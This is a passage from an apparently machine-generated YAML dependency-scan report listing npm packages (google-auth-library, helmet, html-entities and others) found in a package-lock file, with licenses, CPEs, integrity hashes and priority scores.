kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 59d2bd18fdd1d561
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: google-auth-library 9.15.1'
title: google-auth-library 9.15.1
description: 'Package discovered: google-auth-library 9.15.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4fb04863a4dacd73
name: google-auth-library
version: 9.15.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:google-auth-library:google-auth-library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google-auth-library:google_auth_library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_auth_library:google-auth-library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_auth_library:google_auth_library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google-auth:google-auth-library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google-auth:google_auth_library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_auth:google-auth-library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_auth:google_auth_library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google:google-auth-library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google:google_auth_library:9.15.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/google-auth-library@9.15.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/google-auth-library/-/google-auth-library-9.15.1.tgz
integrity: sha512-Jb6Z0+nvECVz+2lzSMt9u98UsoakXxA2HGHMCxh+so3n90XgYWkq5dur19JAJV7ONiJY22yBTyJB1TSkvPq9Ng==
dependencies:
base64-js: ^1.3.0
ecdsa-sig-formatter: ^1.0.11
gaxios: ^6.1.1
gcp-metadata: ^6.1.0
gtoken: ^7.0.0
jws: ^4.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f744ca691ff58390
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: google-gax 4.6.1'
title: google-gax 4.6.1
description: 'Package discovered: google-gax 4.6.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3344aade71052029
name: google-gax
version: 4.6.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:google-gax:google-gax:4.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google-gax:google_gax:4.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_gax:google-gax:4.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_gax:google_gax:4.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google:google-gax:4.6.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google:google_gax:4.6.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/google-gax@4.6.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/google-gax/-/google-gax-4.6.1.tgz
integrity: sha512-V6eky/xz2mcKfAd1Ioxyd6nmA61gao3n01C+YeuIwu3vzM9EDR6wcVzMSIbLMDXWeoi9SHYctXuKYC5uJUT3eQ==
dependencies:
'@grpc/grpc-js': ^1.10.9
'@grpc/proto-loader': ^0.7.13
'@types/long': ^4.0.0
abort-controller: ^3.0.0
duplexify: ^4.0.0
google-auth-library: ^9.3.0
node-fetch: ^2.7.0
object-hash: ^3.0.0
proto3-json-serializer: ^2.0.2
protobufjs: ^7.3.2
retry-request: ^7.0.0
uuid: ^9.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 38ca80e4adb1c1ba
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: google-logging-utils 0.0.2'
title: google-logging-utils 0.0.2
description: 'Package discovered: google-logging-utils 0.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c45a9f7f7c5a1d26
name: google-logging-utils
version: 0.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:google-logging-utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google-logging-utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_logging_utils:google-logging-utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_logging_utils:google_logging_utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google-logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google-logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_logging:google-logging-utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google_logging:google_logging_utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google:google-logging-utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:google:google_logging_utils:0.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/google-logging-utils@0.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/google-logging-utils/-/google-logging-utils-0.0.2.tgz
integrity: sha512-NEgUnEcBiP5HrPzufUkBzJOD/Sxsco3rLNo1F1TNf7ieU8ryUzBhqba8r756CjLX7rn3fHl6iLEwPYuqpoKgQQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: bb6c934fdca5487f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: gopd 1.2.0'
title: gopd 1.2.0
description: 'Package discovered: gopd 1.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2f2433574e565258
name: gopd
version: 1.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:gopd:gopd:1.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/gopd@1.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz
integrity: sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 30861bd8904bacc9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: graceful-fs 4.2.11'
title: graceful-fs 4.2.11
description: 'Package discovered: graceful-fs 4.2.11'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 45319b4c36cfb339
name: graceful-fs
version: 4.2.11
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:graceful-fs:graceful-fs:4.2.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:graceful-fs:graceful_fs:4.2.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:graceful_fs:graceful-fs:4.2.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:graceful_fs:graceful_fs:4.2.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:graceful:graceful-fs:4.2.11:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:graceful:graceful_fs:4.2.11:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/graceful-fs@4.2.11
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz
integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a916a255ccf430d7
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: gtoken 7.1.0'
title: gtoken 7.1.0
description: 'Package discovered: gtoken 7.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fe4d11ddc8ba95f7
name: gtoken
version: 7.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:gtoken:gtoken:7.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/gtoken@7.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/gtoken/-/gtoken-7.1.0.tgz
integrity: sha512-pCcEwRi+TKpMlxAQObHDQ56KawURgyAf6jtIY046fJ5tIv3zDe/LEIubckAO8fj6JnAxLdmWkUfNyulQ2iKdEw==
dependencies:
gaxios: ^6.0.0
jws: ^4.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d28454794acf7740
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: has-symbols 1.1.0'
title: has-symbols 1.1.0
description: 'Package discovered: has-symbols 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: fcd80b2c54be3c8f
name: has-symbols
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:has-symbols:has-symbols:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has-symbols:has_symbols:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has_symbols:has-symbols:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has_symbols:has_symbols:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has:has-symbols:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has:has_symbols:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/has-symbols@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz
integrity: sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f33597863ab8f3be
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: has-tostringtag 1.0.2'
title: has-tostringtag 1.0.2
description: 'Package discovered: has-tostringtag 1.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 7749e9981a33e1c1
name: has-tostringtag
version: 1.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:has-tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has-tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has_tostringtag:has-tostringtag:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has_tostringtag:has_tostringtag:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has:has-tostringtag:1.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:has:has_tostringtag:1.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/has-tostringtag@1.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz
integrity: sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==
dependencies:
has-symbols: ^1.0.3
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 96e286f1b1295263
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: hasown 2.0.3'
title: hasown 2.0.3
description: 'Package discovered: hasown 2.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 6f96b80a7d603954
name: hasown
version: 2.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:hasown:hasown:2.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/hasown@2.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/hasown/-/hasown-2.0.3.tgz
integrity: sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==
dependencies:
function-bind: ^1.1.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: e883502c6fb5e040
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: helmet 7.2.0'
title: helmet 7.2.0
description: 'Package discovered: helmet 7.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ad14b3d3d950e009
name: helmet
version: 7.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:helmet:helmet:7.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/helmet@7.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/helmet/-/helmet-7.2.0.tgz
integrity: sha512-ZRiwvN089JfMXokizgqEPXsl2Guk094yExfoDXR0cBYWxtBbaSww/w+vT4WEJsBW2iTUi1GgZ6swmoug3Oy4Xw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 5ce7a5c301b19471
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: hsl-to-hex 1.0.0'
title: hsl-to-hex 1.0.0
description: 'Package discovered: hsl-to-hex 1.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5912401178cdcd30
name: hsl-to-hex
version: 1.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:hsl-to-hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to-hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl:hsl-to-hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl:hsl_to_hex:1.0.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/hsl-to-hex@1.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/hsl-to-hex/-/hsl-to-hex-1.0.0.tgz
integrity: sha512-K6GVpucS5wFf44X0h2bLVRDsycgJmf9FF2elg+CrqD8GcFU8c6vYhgXn8NjUkFCwj+xDFb70qgLbTUm6sxwPmA==
dependencies:
hsl-to-rgb-for-reals: ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 342f7c75e7dae76e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: hsl-to-rgb-for-reals 1.1.1'
title: hsl-to-rgb-for-reals 1.1.1
description: 'Package discovered: hsl-to-rgb-for-reals 1.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 52590567976abaf8
name: hsl-to-rgb-for-reals
version: 1.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to-rgb-for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to-rgb-for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_rgb_for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_rgb_for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to-rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to-rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to_rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl-to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl_to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:hsl:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/hsl-to-rgb-for-reals@1.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/hsl-to-rgb-for-reals/-/hsl-to-rgb-for-reals-1.1.1.tgz
integrity: sha512-LgOWAkrN0rFaQpfdWBQlv/VhkOxb5AsBjk6NQVx4yEzWS923T07X0M1Y0VNko2H52HeSpZrZNNMJ0aFqsdVzQg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9e434aef3ca36a26
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: html-entities 2.6.0'
title: html-entities 2.6.0
description: 'Package discovered: html-entities 2.6.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 4d1e475b46ee4f29
name: html-entities
version: 2.6.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:html-entities:html-entities:2.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html-entities:html_entities:2.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html_entities:html-entities:2.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html_entities:html_entities:2.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html:html-entities:2.6.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:html:html_entities:2.6.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/html-entities@2.6.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/html-entities/-/html-entities-2.6.0.tgz
integrity: sha512-kig+rMn/QOVRvr7c86gQ8lWXq+Hkv6CbAH1hLu+RG338StTpE8Z0b44SDVaqVu7HGKf27frdmUYEs9hTUX/cLQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 73fec784f0f7a1eb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: html-to-text 9.0.5'
title: html-to-text 9.0.5
description: 'Package discovered: html-to-text 9.0.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 41ee91a75a779a86
name: html-to-text
version: 9.0.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:html-to-text:html-to-text:9.0.5:*:*:*:*:*:*:*
source: syft-generated
